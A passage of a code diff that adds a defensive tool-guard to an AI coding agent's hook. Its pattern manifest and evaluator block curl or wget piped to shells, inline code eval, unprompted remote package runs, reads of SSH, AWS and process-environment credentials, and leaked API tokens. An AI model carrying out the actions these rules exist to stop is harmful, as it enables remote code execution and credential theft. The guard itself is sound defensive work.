+        { "s": "token", "bStart": true, "bEnd": true }
+      ]
+    },
+    {
+      "reason": "npm token management",
+      "kind": "matchers",
+      "matchers": [
+        { "s": "npm", "bStart": true, "bEnd": true },
+        { "s": "token", "bStart": true, "bEnd": true },
+        { "s": "create", "bStart": true, "bEnd": true }
+      ]
+    },
+    {
+      "reason": "npm token management",
+      "kind": "matchers",
+      "matchers": [
+        { "s": "npm", "bStart": true, "bEnd": true },
+        { "s": "token", "bStart": true, "bEnd": true },
+        { "s": "revoke", "bStart": true, "bEnd": true }
+      ]
+    },
+    {
+      "reason": "npm token management",
+      "kind": "matchers",
+      "matchers": [
+        { "s": "npm", "bStart": true, "bEnd": true },
+        { "s": "token", "bStart": true, "bEnd": true },
+        { "s": "list", "bStart": true, "bEnd": true }
+      ]
+    },
+    {
+      "reason": "curl piped to an interpreter (remote code execution)",
+      "kind": "predicate",
+      "predicate": "curlPipedToInterpreter"
+    },
+    {
+      "reason": "wget piped to a shell (remote code execution)",
+      "kind": "predicate",
+      "predicate": "wgetPipedToShell"
+    },
+    {
+      "reason": "inline node eval (node -e / -p)",
+      "kind": "matchers",
+      "matchers": [{ "s": "node", "bStart": true, "bEnd": true }, { "s": "-e", "bEnd": true }]
+    },
+    {
+      "reason": "inline node eval (node -e / -p)",
+      "kind": "matchers",
+      "matchers": [{ "s": "node", "bStart": true, "bEnd": true }, { "s": "--eval", "bEnd": true }]
+    },
+    {
+      "reason": "inline node eval (node -e / -p)",
+      "kind": "matchers",
+      "matchers": [{ "s": "node", "bStart": true, "bEnd": true }, { "s": "-p", "bEnd": true }]
+    },
+    {
+      "reason": "inline node eval (node -e / -p)",
+      "kind": "matchers",
+      "matchers": [{ "s": "node", "bStart": true, "bEnd": true }, { "s": "--print", "bEnd": true }]
+    },
+    {
+      "reason": "inline python eval (python -c)",
+      "kind": "matchers",
+      "matchers": [{ "s": "python", "bStart": true }, { "s": "-c", "bEnd": true }]
+    },
+    {
+      "reason": "pnpm dlx (downloads + runs a remote package)",
+      "kind": "matchers",
+      "matchers": [
+        { "s": "pnpm", "bStart": true, "bEnd": true },
+        { "s": "dlx", "bStart": true, "bEnd": true }
+      ]
+    },
+    {
+      "reason": "npm exec (runs an arbitrary package)",
+      "kind": "matchers",
+      "matchers": [
+        { "s": "npm", "bStart": true, "bEnd": true },
+        { "s": "exec", "bStart": true, "bEnd": true }
+      ]
+    },
+    {
+      "reason": "npx --yes (unprompted remote package execution)",
+      "kind": "matchers",
+      "matchers": [{ "s": "npx", "bStart": true, "bEnd": true }, { "s": "-y", "bEnd": true }]
+    },
+    {
+      "reason": "npx --yes (unprompted remote package execution)",
+      "kind": "matchers",
+      "matchers": [{ "s": "npx", "bStart": true, "bEnd": true }, { "s": "--yes", "bEnd": true }]
+    },
+    { "reason": "destructive gh api DELETE", "kind": "predicate", "predicate": "ghApiDelete" }
+  ],
+  "productionDb": {
+    "commandTriggers": ["drizzle-kit", "psql", "db:migrate"],
+    "urlIndicators": ["neon.tech", "supabase.co", ".prod."]
+  },
+  "credentialPathEndsWith": [
+    "/.ssh/id_rsa",
+    "/.ssh/id_ed25519",
+    "/.ssh/id_ecdsa",
+    "/.ssh/id_dsa",
+    "/.ssh/authorized_keys",
+    "/.ssh/known_hosts",
+    "/.ssh/config",
+    "/.aws/credentials",
+    "/.aws/config",
+    "/.config/gh/hosts.yml",
+    "/.npmrc",
+    "/.netrc"
+  ],
+  "credentialPathContains": ["/.gnupg/", "/run/secrets/"],
+  "credentialPathPredicates": ["procEnviron"],
+  "blockedWritePrefixes": [
+    "/mnt/c/",
+    "/mnt/e/",
+    "/etc/",
+    "/usr/",
+    "/var/",
+    "/boot/",
+    "/sys/",
+    "/proc/"
+  ],
+  "blockedWriteHomeRelativePrefixes": [".ssh", ".aws", ".gnupg", ".config/gh"],
+  "lockFiles": [
+    "package-lock.json",
+    "npm-shrinkwrap.json",
+    "pnpm-lock.yaml",
+    "yarn.lock",
+    "bun.lockb",
+    "bun.lock",
+    "flake.lock",
+    "deno.lock",
+    "Cargo.lock",
+    "poetry.lock",
+    "Pipfile.lock",
+    "pdm.lock",
+    "uv.lock",
+    "Gemfile.lock",
+    "go.sum",
+    "composer.lock"
+  ],
+  "envTemplateExact": [".env.example", ".env.template", ".env.test"],
+  "envTemplateSuffixes": [".example", ".template"],
+  "contentSecrets": [
+    {
+      "severity": "block",
+      "reason": "private key material",
+      "kind": "pemPrivateKey",
+      "begin": "-----BEGIN ",
+      "end": "PRIVATE KEY-----",
+      "types": ["", "RSA ", "EC ", "OPENSSH ", "DSA "]
+    },
+    {
+      "severity": "block",
+      "reason": "Stripe live secret key",
+      "kind": "token",
+      "prefix": "sk_live_",
+      "len": 20,
+      "mode": "min",
+      "charset": "alnum"
+    },
+    {
+      "severity": "warn",
+      "reason": "Anthropic API key",
+      "kind": "predicate",
+      "predicate": "anthropicApiKey"
+    },
+    {
+      "severity": "warn",
+      "reason": "GitHub personal access token",
+      "kind": "token",
+      "prefix": "ghp_",
+      "len": 36,
+      "mode": "exact",
+      "charset": "alnum"
+    },
+    {
+      "severity": "warn",
+      "reason": "GitHub server token",
+      "kind": "token",
+      "prefix": "ghs_",
+      "len": 36,
+      "mode": "exact",
+      "charset": "alnum"
+    },
+    {
+      "severity": "warn",
+      "reason": "GitHub OAuth token",
+      "kind": "token",
+      "prefix": "gho_",
+      "len": 36,
+      "mode": "exact",
+      "charset": "alnum"
+    },
+    {
+      "severity": "warn",
+      "reason": "GitHub fine-grained PAT",
+      "kind": "token",
+      "prefix": "github_pat_",
+      "len": 82,
+      "mode": "exact",
+      "charset": "alnumUnderscore"
+    },
+    {
+      "severity": "warn",
+      "reason": "npm token",
+      "kind": "token",
+      "prefix": "npm_",
+      "len": 36,
+      "mode": "exact",
+      "charset": "alnum"
+    },
+    {
+      "severity": "warn",
+      "reason": "AWS access key ID",
+      "kind": "token",
+      "prefix": "AKIA",
+      "len": 16,
+      "mode": "exact",
+      "charset": "upperDigit"
+    }
+  ]
+}

--- a/packages/daemon/src/tool-guard/patterns.json
+++ b/packages/daemon/src/tool-guard/patterns.json
@@ -233,16 +233,7 @@
   ],
   "credentialPathContains": ["/.gnupg/", "/run/secrets/"],
   "credentialPathPredicates": ["procEnviron"],
-  "blockedWritePrefixes": [
-    "/mnt/c/",
-    "/mnt/e/",
-    "/etc/",
-    "/usr/",
-    "/var/",
-    "/boot/",
-    "/sys/",
-    "/proc/"
-  ],
+  "blockedWritePrefixes": ["/mnt/c/", "/etc/", "/usr/", "/var/", "/boot/", "/sys/", "/proc/"],
   "blockedWriteHomeRelativePrefixes": [".ssh", ".aws", ".gnupg", ".config/gh"],
   "lockFiles": [
     "package-lock.json",

--- a/packages/daemon/src/tool-guard/patterns.ts
+++ b/packages/daemon/src/tool-guard/patterns.ts
@@ -1,0 +1,698 @@
+/**
+ * tool-guard pattern loader.
+ *
+ * Loads the canonical security-pattern manifest (patterns.json), validates its
+ * shape at load, computes a stable content hash, and exposes pure predicate
+ * evaluators over commands / file paths / write content.
+ *
+ * The manifest is DATA (substrings, prefix lists, and structured matchers).
+ * Anything a substring/prefix cannot express is a NAMED typed predicate keyed
+ * from the manifest and implemented here — never a regex string, per the fleet
+ * no-regex rule. Every matcher is evaluated with character-boundary logic
+ * (isWordChar / wordBoundaryAt), not RegExp.
+ *
+ * Two consumers share this one manifest: the daemon (imports this loader) and
+ * the Claude Code PreToolUse hook (a vendored copy of patterns.json plus a CJS
+ * mirror of this evaluator). The content hash lets a divergence surface.
+ */
+
+import { createHash } from 'node:crypto';
+import rawManifest from './patterns.json';
+
+// ---------------------------------------------------------------------------
+// Manifest types
+// ---------------------------------------------------------------------------
+
+/** One element of an ordered matcher: a substring plus optional word-boundary asserts. */
+export interface Matcher {
+  s: string;
+  bStart?: boolean;
+  bEnd?: boolean;
+}
+
+export interface MatchersRule {
+  reason: string;
+  kind: 'matchers';
+  ci?: boolean;
+  matchers: Matcher[];
+}
+
+export interface PredicateRule {
+  reason: string;
+  kind: 'predicate';
+  predicate: string;
+}
+
+export type DangerousCommandRule = MatchersRule | PredicateRule;
+
+export interface ProductionDb {
+  commandTriggers: string[];
+  urlIndicators: string[];
+}
+
+export type ContentSecretSeverity = 'block' | 'warn';
+
+export interface SubstringAnySecret {
+  severity: ContentSecretSeverity;
+  reason: string;
+  kind: 'substringAny';
+  needles: string[];
+}
+
+export interface PemPrivateKeySecret {
+  severity: ContentSecretSeverity;
+  reason: string;
+  kind: 'pemPrivateKey';
+  begin: string;
+  end: string;
+  types: string[];
+}
+
+export type TokenCharset = 'alnum' | 'alnumUnderscore' | 'upperDigit';
+
+export interface TokenSecret {
+  severity: ContentSecretSeverity;
+  reason: string;
+  kind: 'token';
+  prefix: string;
+  len: number;
+  mode: 'exact' | 'min';
+  charset: TokenCharset;
+}
+
+export interface PredicateSecret {
+  severity: ContentSecretSeverity;
+  reason: string;
+  kind: 'predicate';
+  predicate: string;
+}
+
+export type ContentSecret =
+  | SubstringAnySecret
+  | PemPrivateKeySecret
+  | TokenSecret
+  | PredicateSecret;
+
+export interface PatternManifest {
+  version: number;
+  dangerousCommands: DangerousCommandRule[];
+  productionDb: ProductionDb;
+  credentialPathEndsWith: string[];
+  credentialPathContains: string[];
+  credentialPathPredicates: string[];
+  blockedWritePrefixes: string[];
+  blockedWriteHomeRelativePrefixes: string[];
+  lockFiles: string[];
+  envTemplateExact: string[];
+  envTemplateSuffixes: string[];
+  contentSecrets: ContentSecret[];
+}
+
+export interface CommandVerdict {
+  reason: string;
+}
+
+export interface ContentVerdict {
+  severity: ContentSecretSeverity;
+  reason: string;
+}
+
+// ---------------------------------------------------------------------------
+// Character helpers (no regex)
+// ---------------------------------------------------------------------------
+
+function isWordChar(ch: string | undefined): boolean {
+  if (ch === undefined || ch.length === 0) return false;
+  const c = ch.charCodeAt(0);
+  return (
+    (c >= 48 && c <= 57) || // 0-9
+    (c >= 65 && c <= 90) || // A-Z
+    (c >= 97 && c <= 122) || // a-z
+    c === 95 // _
+  );
+}
+
+function isDigit(ch: string | undefined): boolean {
+  if (ch === undefined) return false;
+  const c = ch.charCodeAt(0);
+  return c >= 48 && c <= 57;
+}
+
+function isWhitespace(ch: string | undefined): boolean {
+  if (ch === undefined) return false;
+  const c = ch.charCodeAt(0);
+  // space, tab, LF, CR, FF, VT
+  return c === 32 || c === 9 || c === 10 || c === 13 || c === 12 || c === 11;
+}
+
+/** True when index `i` in `s` is a word boundary (word/non-word transition). */
+function wordBoundaryAt(s: string, i: number): boolean {
+  const before = i > 0 && isWordChar(s[i - 1]);
+  const after = i < s.length && isWordChar(s[i]);
+  return before !== after;
+}
+
+function inCharset(ch: string | undefined, charset: TokenCharset): boolean {
+  if (ch === undefined || ch.length === 0) return false;
+  const c = ch.charCodeAt(0);
+  const isUpper = c >= 65 && c <= 90;
+  const isLower = c >= 97 && c <= 122;
+  const isNum = c >= 48 && c <= 57;
+  switch (charset) {
+    case 'alnum':
+      return isUpper || isLower || isNum;
+    case 'alnumUnderscore':
+      return isUpper || isLower || isNum || c === 95;
+    case 'upperDigit':
+      return isUpper || isNum;
+    default:
+      return false;
+  }
+}
+
+// ---------------------------------------------------------------------------
+// Ordered matcher engine
+// ---------------------------------------------------------------------------
+
+/**
+ * True when every matcher appears in `text` in order, each satisfying its
+ * word-boundary asserts. `ci` lower-cases both haystack and needles.
+ */
+function matchOrdered(text: string, matchers: Matcher[], ci: boolean): boolean {
+  const hay = ci ? text.toLowerCase() : text;
+  let pos = 0;
+  for (const m of matchers) {
+    const needle = ci ? m.s.toLowerCase() : m.s;
+    let idx = hay.indexOf(needle, pos);
+    let found = -1;
+    while (idx !== -1) {
+      const startOk = !m.bStart || idx === 0 || !isWordChar(hay[idx - 1]);
+      const end = idx + needle.length;
+      const endOk = !m.bEnd || end >= hay.length || !isWordChar(hay[end]);
+      if (startOk && endOk) {
+        found = idx;
+        break;
+      }
+      idx = hay.indexOf(needle, idx + 1);
+    }
+    if (found === -1) return false;
+    pos = found + needle.length;
+  }
+  return true;
+}
+
+// ---------------------------------------------------------------------------
+// Named command predicates
+// ---------------------------------------------------------------------------
+
+/** `powershell` (optionally `.exe`) immediately followed by whitespace, case-insensitive. */
+function powershellInvocation(command: string): boolean {
+  const lower = command.toLowerCase();
+  const token = 'powershell';
+  let idx = lower.indexOf(token);
+  while (idx !== -1) {
+    const startOk = idx === 0 || !isWordChar(lower[idx - 1]);
+    if (startOk) {
+      let pos = idx + token.length;
+      if (lower.startsWith('.exe', pos)) pos += 4;
+      if (isWhitespace(lower[pos])) return true;
+    }
+    idx = lower.indexOf(token, idx + 1);
+  }
+  return false;
+}
+
+/** `wsl.exe` + whitespace + (`--exec` | `--`) + whitespace. */
+function wslInterop(command: string): boolean {
+  const token = 'wsl.exe';
+  let idx = command.indexOf(token);
+  while (idx !== -1) {
+    const startOk = idx === 0 || !isWordChar(command[idx - 1]);
+    if (startOk) {
+      let p = idx + token.length;
+      let sawWs = false;
+      while (isWhitespace(command[p])) {
+        p += 1;
+        sawWs = true;
+      }
+      if (sawWs) {
+        if (command.startsWith('--exec', p) && isWhitespace(command[p + 6])) return true;
+        if (command.startsWith('--', p) && isWhitespace(command[p + 2])) return true;
+      }
+    }
+    idx = command.indexOf(token, idx + 1);
+  }
+  return false;
+}
+
+/** `>` then optional whitespace then `/mnt/c/`. */
+function redirectToWindows(command: string): boolean {
+  let idx = command.indexOf('>');
+  while (idx !== -1) {
+    let p = idx + 1;
+    while (isWhitespace(command[p])) p += 1;
+    if (command.startsWith('/mnt/c/', p)) return true;
+    idx = command.indexOf('>', idx + 1);
+  }
+  return false;
+}
+
+/** Match `interp\b` at position p for one of the given interpreter tokens. */
+function interpreterAt(text: string, p: number, interpreters: string[]): boolean {
+  for (const interp of interpreters) {
+    if (text.startsWith(interp, p)) {
+      let end = p + interp.length;
+      // python3? — allow an optional trailing "3".
+      if (interp === 'python' && text[end] === '3') end += 1;
+      if (end >= text.length || !isWordChar(text[end])) return true;
+    }
+  }
+  return false;
+}
+
+/** `fetcher\b` then non-pipe chars, a pipe, optional whitespace, then a listed interpreter. */
+function fetcherPipedTo(command: string, fetcher: string, interpreters: string[]): boolean {
+  let idx = command.indexOf(fetcher);
+  while (idx !== -1) {
+    const startOk = idx === 0 || !isWordChar(command[idx - 1]);
+    const end = idx + fetcher.length;
+    const endOk = end >= command.length || !isWordChar(command[end]);
+    if (startOk && endOk) {
+      const pipe = command.indexOf('|', end);
+      if (pipe !== -1) {
+        let p = pipe + 1;
+        while (isWhitespace(command[p])) p += 1;
+        if (interpreterAt(command, p, interpreters)) return true;
+      }
+    }
+    idx = command.indexOf(fetcher, idx + 1);
+  }
+  return false;
+}
+
+function curlPipedToInterpreter(command: string): boolean {
+  return fetcherPipedTo(command, 'curl', ['bash', 'sh', 'zsh', 'node', 'python', 'perl', 'ruby']);
+}
+
+function wgetPipedToShell(command: string): boolean {
+  return fetcherPipedTo(command, 'wget', ['bash', 'sh', 'zsh']);
+}
+
+/** `gh api` then, anywhere after, `-X DELETE` or `--method[ =]DELETE` (case-insensitive). */
+function ghApiDelete(command: string): boolean {
+  const lower = command.toLowerCase();
+  let idx = lower.indexOf('gh');
+  while (idx !== -1) {
+    const startOk = idx === 0 || !isWordChar(lower[idx - 1]);
+    if (startOk) {
+      let p = idx + 2;
+      let sawWs = false;
+      while (isWhitespace(lower[p])) {
+        p += 1;
+        sawWs = true;
+      }
+      if (sawWs && lower.startsWith('api', p)) {
+        const apiEnd = p + 3;
+        if (apiEnd >= lower.length || !isWordChar(lower[apiEnd])) {
+          if (deleteFormAfter(lower, apiEnd)) return true;
+        }
+      }
+    }
+    idx = lower.indexOf('gh', idx + 1);
+  }
+  return false;
+}
+
+/** `-x` (+ ws) + `delete`, or `--method` + (` ` | `=`) + ws + `delete`, in already-lowercased text. */
+function deleteFormAfter(lower: string, from: number): boolean {
+  let x = lower.indexOf('-x', from);
+  while (x !== -1) {
+    let p = x + 2;
+    while (isWhitespace(lower[p])) p += 1;
+    if (lower.startsWith('delete', p)) return true;
+    x = lower.indexOf('-x', x + 1);
+  }
+  let m = lower.indexOf('--method', from);
+  while (m !== -1) {
+    let p = m + 8;
+    if (lower[p] === ' ' || lower[p] === '=') {
+      p += 1;
+      while (isWhitespace(lower[p])) p += 1;
+      if (lower.startsWith('delete', p)) return true;
+    }
+    m = lower.indexOf('--method', m + 1);
+  }
+  return false;
+}
+
+const COMMAND_PREDICATES: Record<string, (command: string) => boolean> = {
+  powershellInvocation,
+  wslInterop,
+  redirectToWindows,
+  curlPipedToInterpreter,
+  wgetPipedToShell,
+  ghApiDelete,
+};
+
+// ---------------------------------------------------------------------------
+// Named credential-path predicates
+// ---------------------------------------------------------------------------
+
+/** `/proc/<digits>/environ` at end of path. */
+function procEnviron(path: string): boolean {
+  const tail = '/environ';
+  if (!path.endsWith(tail)) return false;
+  const digitsEnd = path.length - tail.length;
+  const marker = '/proc/';
+  let k = path.indexOf(marker);
+  while (k !== -1) {
+    const digitsStart = k + marker.length;
+    if (digitsStart < digitsEnd) {
+      let allDigits = true;
+      for (let i = digitsStart; i < digitsEnd; i += 1) {
+        if (!isDigit(path[i])) {
+          allDigits = false;
+          break;
+        }
+      }
+      if (allDigits) return true;
+    }
+    k = path.indexOf(marker, k + 1);
+  }
+  return false;
+}
+
+const CREDENTIAL_PATH_PREDICATES: Record<string, (path: string) => boolean> = {
+  procEnviron,
+};
+
+// ---------------------------------------------------------------------------
+// Named content-secret predicates + token/pem matchers
+// ---------------------------------------------------------------------------
+
+/** `sk-ant-api` + 2 digits + `-` + >=90 of [A-Za-z0-9_-]. */
+function anthropicApiKey(content: string): boolean {
+  const prefix = 'sk-ant-api';
+  let idx = content.indexOf(prefix);
+  while (idx !== -1) {
+    const startOk = idx === 0 || !isWordChar(content[idx - 1]);
+    if (startOk) {
+      let p = idx + prefix.length;
+      if (isDigit(content[p]) && isDigit(content[p + 1]) && content[p + 2] === '-') {
+        p += 3;
+        let run = 0;
+        while (p + run < content.length) {
+          const ch = content[p + run];
+          if (inCharset(ch, 'alnumUnderscore') || ch === '-') run += 1;
+          else break;
+        }
+        if (run >= 90) return true;
+      }
+    }
+    idx = content.indexOf(prefix, idx + 1);
+  }
+  return false;
+}
+
+const CONTENT_PREDICATES: Record<string, (content: string) => boolean> = {
+  anthropicApiKey,
+};
+
+function matchToken(content: string, spec: TokenSecret): boolean {
+  let idx = content.indexOf(spec.prefix);
+  while (idx !== -1) {
+    const startOk = idx === 0 || !isWordChar(content[idx - 1]);
+    if (startOk) {
+      const runStart = idx + spec.prefix.length;
+      let run = 0;
+      while (runStart + run < content.length && inCharset(content[runStart + run], spec.charset)) {
+        run += 1;
+      }
+      if (spec.mode === 'exact') {
+        if (run === spec.len && wordBoundaryAt(content, runStart + spec.len)) return true;
+      } else if (run >= spec.len && wordBoundaryAt(content, runStart + run)) {
+        return true;
+      }
+    }
+    idx = content.indexOf(spec.prefix, idx + 1);
+  }
+  return false;
+}
+
+function matchPemPrivateKey(content: string, spec: PemPrivateKeySecret): boolean {
+  for (const type of spec.types) {
+    if (content.includes(spec.begin + type + spec.end)) return true;
+  }
+  return false;
+}
+
+// ---------------------------------------------------------------------------
+// Public evaluators
+// ---------------------------------------------------------------------------
+
+/** First dangerous-command rule matching `command`, or null. */
+export function evaluateCommand(command: string, manifest: PatternManifest): CommandVerdict | null {
+  for (const rule of manifest.dangerousCommands) {
+    if (rule.kind === 'matchers') {
+      if (matchOrdered(command, rule.matchers, rule.ci === true)) {
+        return { reason: rule.reason };
+      }
+    } else {
+      const pred = COMMAND_PREDICATES[rule.predicate];
+      if (pred?.(command)) return { reason: rule.reason };
+    }
+  }
+  return null;
+}
+
+/**
+ * First content-secret verdict, preferring `block` (manifest lists block
+ * entries first, so first match preserves the hook's block-before-warn order).
+ */
+export function evaluateContentSecrets(
+  content: string,
+  manifest: PatternManifest,
+): ContentVerdict | null {
+  for (const secret of manifest.contentSecrets) {
+    let hit = false;
+    switch (secret.kind) {
+      case 'substringAny':
+        hit = secret.needles.some((n) => content.includes(n));
+        break;
+      case 'pemPrivateKey':
+        hit = matchPemPrivateKey(content, secret);
+        break;
+      case 'token':
+        hit = matchToken(content, secret);
+        break;
+      default: {
+        const pred = CONTENT_PREDICATES[secret.predicate];
+        hit = pred ? pred(content) : false;
+        break;
+      }
+    }
+    if (hit) return { severity: secret.severity, reason: secret.reason };
+  }
+  return null;
+}
+
+/** True when a normalized (forward-slash) path is a protected credential file. */
+export function isCredentialPath(normPath: string, manifest: PatternManifest): boolean {
+  if (manifest.credentialPathEndsWith.some((s) => normPath.endsWith(s))) return true;
+  if (manifest.credentialPathContains.some((s) => normPath.includes(s))) return true;
+  for (const name of manifest.credentialPathPredicates) {
+    const pred = CREDENTIAL_PATH_PREDICATES[name];
+    if (pred?.(normPath)) return true;
+  }
+  return false;
+}
+
+/** True when a normalized write path falls under a protected system prefix. */
+export function isBlockedWritePath(
+  normPath: string,
+  homeDir: string,
+  manifest: PatternManifest,
+): boolean {
+  if (manifest.blockedWritePrefixes.some((p) => normPath.startsWith(p))) return true;
+  const home = homeDir.replace(/\\/g, '/');
+  for (const rel of manifest.blockedWriteHomeRelativePrefixes) {
+    if (normPath.startsWith(`${home}/${rel}/`)) return true;
+  }
+  return false;
+}
+
+/** True when a lowercased ".env"-prefixed basename is a committed-template exemption. */
+export function isEnvTemplate(lowerBasename: string, manifest: PatternManifest): boolean {
+  if (manifest.envTemplateExact.includes(lowerBasename)) return true;
+  if (!lowerBasename.startsWith('.env.')) return false;
+  for (const suffix of manifest.envTemplateSuffixes) {
+    if (lowerBasename.endsWith(suffix) && lowerBasename.length > '.env.'.length + suffix.length) {
+      return true;
+    }
+  }
+  return false;
+}
+
+/** True when a basename is a protected .env file (not a committed template). */
+export function isProtectedEnvFile(basename: string, manifest: PatternManifest): boolean {
+  const lower = basename.toLowerCase();
+  return lower.startsWith('.env') && !isEnvTemplate(lower, manifest);
+}
+
+/** True when a basename is a protected lock file. */
+export function isLockFile(basename: string, manifest: PatternManifest): boolean {
+  return manifest.lockFiles.includes(basename);
+}
+
+/**
+ * True when a command targets a production database URL. The command trigger +
+ * URL indicator lists are canonical here; the consumer supplies the URL it
+ * knows about (env var, inline assignment) since the daemon and the hook read
+ * it from different places.
+ */
+export function isProductionDbCommand(
+  command: string,
+  dbUrl: string,
+  manifest: PatternManifest,
+): boolean {
+  if (!dbUrl) return false;
+  const triggered = manifest.productionDb.commandTriggers.some((t) => command.includes(t));
+  if (!triggered) return false;
+  return manifest.productionDb.urlIndicators.some((u) => dbUrl.includes(u));
+}
+
+// ---------------------------------------------------------------------------
+// Load + validate + hash
+// ---------------------------------------------------------------------------
+
+/** Deterministic serialization (recursively key-sorted) for a stable content hash. */
+export function stableStringify(value: unknown): string {
+  if (value === null || typeof value !== 'object') return JSON.stringify(value);
+  if (Array.isArray(value)) return `[${value.map(stableStringify).join(',')}]`;
+  const obj = value as Record<string, unknown>;
+  const keys = Object.keys(obj).sort();
+  return `{${keys.map((k) => `${JSON.stringify(k)}:${stableStringify(obj[k])}`).join(',')}}`;
+}
+
+/** sha256 (hex) of the stably-serialized manifest. */
+export function manifestHash(manifest: PatternManifest): string {
+  return createHash('sha256').update(stableStringify(manifest)).digest('hex');
+}
+
+function assert(condition: boolean, message: string): void {
+  if (!condition) throw new Error(`tool-guard patterns.json invalid: ${message}`);
+}
+
+function isStringArray(value: unknown): value is string[] {
+  return Array.isArray(value) && value.every((v) => typeof v === 'string');
+}
+
+const KNOWN_COMMAND_PREDICATES = new Set(Object.keys(COMMAND_PREDICATES));
+const KNOWN_CREDENTIAL_PREDICATES = new Set(Object.keys(CREDENTIAL_PATH_PREDICATES));
+const KNOWN_CONTENT_PREDICATES = new Set(Object.keys(CONTENT_PREDICATES));
+
+/** Validate manifest shape; throws on any structural problem (fail-closed at load). */
+export function validateManifest(value: unknown): PatternManifest {
+  assert(typeof value === 'object' && value !== null, 'not an object');
+  const m = value as Record<string, unknown>;
+  assert(typeof m.version === 'number', 'version must be a number');
+
+  assert(Array.isArray(m.dangerousCommands), 'dangerousCommands must be an array');
+  for (const rule of m.dangerousCommands as unknown[]) {
+    assert(typeof rule === 'object' && rule !== null, 'dangerousCommands entry not an object');
+    const r = rule as Record<string, unknown>;
+    assert(typeof r.reason === 'string', 'dangerousCommands.reason must be a string');
+    if (r.kind === 'matchers') {
+      assert(
+        Array.isArray(r.matchers) && r.matchers.length > 0,
+        'matchers must be a non-empty array',
+      );
+      for (const mm of r.matchers as unknown[]) {
+        const matcher = mm as Record<string, unknown>;
+        assert(
+          typeof matcher.s === 'string' && matcher.s.length > 0,
+          'matcher.s must be a non-empty string',
+        );
+      }
+    } else if (r.kind === 'predicate') {
+      assert(
+        typeof r.predicate === 'string' && KNOWN_COMMAND_PREDICATES.has(r.predicate),
+        `unknown command predicate: ${String(r.predicate)}`,
+      );
+    } else {
+      assert(false, `unknown dangerousCommands kind: ${String(r.kind)}`);
+    }
+  }
+
+  const pdb = m.productionDb as Record<string, unknown> | undefined;
+  assert(typeof pdb === 'object' && pdb !== null, 'productionDb must be an object');
+  assert(isStringArray(pdb?.commandTriggers), 'productionDb.commandTriggers must be string[]');
+  assert(isStringArray(pdb?.urlIndicators), 'productionDb.urlIndicators must be string[]');
+
+  assert(isStringArray(m.credentialPathEndsWith), 'credentialPathEndsWith must be string[]');
+  assert(isStringArray(m.credentialPathContains), 'credentialPathContains must be string[]');
+  assert(isStringArray(m.credentialPathPredicates), 'credentialPathPredicates must be string[]');
+  for (const name of m.credentialPathPredicates as string[]) {
+    assert(KNOWN_CREDENTIAL_PREDICATES.has(name), `unknown credential predicate: ${name}`);
+  }
+  assert(isStringArray(m.blockedWritePrefixes), 'blockedWritePrefixes must be string[]');
+  assert(
+    isStringArray(m.blockedWriteHomeRelativePrefixes),
+    'blockedWriteHomeRelativePrefixes must be string[]',
+  );
+  assert(isStringArray(m.lockFiles), 'lockFiles must be string[]');
+  assert(isStringArray(m.envTemplateExact), 'envTemplateExact must be string[]');
+  assert(isStringArray(m.envTemplateSuffixes), 'envTemplateSuffixes must be string[]');
+
+  assert(Array.isArray(m.contentSecrets), 'contentSecrets must be an array');
+  for (const secret of m.contentSecrets as unknown[]) {
+    const s = secret as Record<string, unknown>;
+    assert(s.severity === 'block' || s.severity === 'warn', 'contentSecrets.severity invalid');
+    assert(typeof s.reason === 'string', 'contentSecrets.reason must be a string');
+    switch (s.kind) {
+      case 'substringAny':
+        assert(
+          isStringArray(s.needles) && (s.needles as string[]).length > 0,
+          'substringAny.needles invalid',
+        );
+        break;
+      case 'pemPrivateKey':
+        assert(typeof s.begin === 'string', 'pemPrivateKey.begin must be a string');
+        assert(typeof s.end === 'string', 'pemPrivateKey.end must be a string');
+        assert(isStringArray(s.types), 'pemPrivateKey.types must be string[]');
+        break;
+      case 'token':
+        assert(
+          typeof s.prefix === 'string' && (s.prefix as string).length > 0,
+          'token.prefix invalid',
+        );
+        assert(typeof s.len === 'number' && (s.len as number) > 0, 'token.len invalid');
+        assert(s.mode === 'exact' || s.mode === 'min', 'token.mode invalid');
+        assert(
+          s.charset === 'alnum' || s.charset === 'alnumUnderscore' || s.charset === 'upperDigit',
+          'token.charset invalid',
+        );
+        break;
+      case 'predicate':
+        assert(
+          typeof s.predicate === 'string' && KNOWN_CONTENT_PREDICATES.has(s.predicate as string),
+          `unknown content predicate: ${String(s.predicate)}`,
+        );
+        break;
+      default:
+        assert(false, `unknown contentSecrets kind: ${String(s.kind)}`);
+    }
+  }
+
+  return value as PatternManifest;
+}
+
+let cached: { manifest: PatternManifest; hash: string } | null = null;
+
+/** Load, validate, and hash the manifest once. Throws on an invalid manifest. */
+export function loadPatterns(): { manifest: PatternManifest; hash: string } {
+  if (cached) return cached;
+  const manifest = validateManifest(rawManifest);
+  cached = { manifest, hash: manifestHash(manifest) };
+  return cached;
+}

--- a/packages/daemon/src/tool-guard/sync-vendored.ts
+++ b/packages/daemon/src/tool-guard/sync-vendored.ts
@@ -1,0 +1,40 @@
+/**
+ * Sync the canonical tool-guard manifest to its vendored Claude Code hook copy.
+ *
+ * The PreToolUse hook must work with no revdev checkout and no build step, so
+ * it carries a vendored copy of patterns.json. This is the one-command sync:
+ * write the manifest to the hook's lib dir and print the content hash. A
+ * session-start check (guard-patterns-check.js) and the daemon CI hash test
+ * catch any divergence.
+ *
+ * Build the daemon first, then run:
+ *   node packages/daemon/dist/tool-guard/sync-vendored.js
+ *
+ * The vendored file is pretty-printed from the in-memory manifest, so its bytes
+ * may differ from the source file's formatting; the content hash (a key-sorted
+ * stable serialization) is identical either way, which is what the lockstep
+ * check compares.
+ */
+
+import { mkdirSync, writeFileSync } from 'node:fs';
+import { homedir } from 'node:os';
+import { join } from 'node:path';
+import { loadPatterns } from './patterns.js';
+
+function main(): void {
+  const destDir = join(homedir(), '.claude', 'hooks', 'lib');
+  const dest = join(destDir, 'guard-patterns.json');
+
+  const { hash, manifest } = loadPatterns();
+
+  mkdirSync(destDir, { recursive: true });
+  writeFileSync(dest, `${JSON.stringify(manifest, null, 2)}\n`, 'utf8');
+
+  process.stdout.write(
+    `tool-guard manifest v${manifest.version} synced\n` +
+      `  dest:   ${dest}\n` +
+      `  sha256: ${hash}\n`,
+  );
+}
+
+main();

--- a/packages/daemon/tsconfig.json
+++ b/packages/daemon/tsconfig.json
@@ -5,6 +5,7 @@
     "rootDir": "src",
     "declaration": true,
     "declarationMap": true,
+    "resolveJsonModule": true,
     "lib": ["ES2022"],
     "types": ["node"]
   },

--- a/packages/daemon/tsup.config.ts
+++ b/packages/daemon/tsup.config.ts
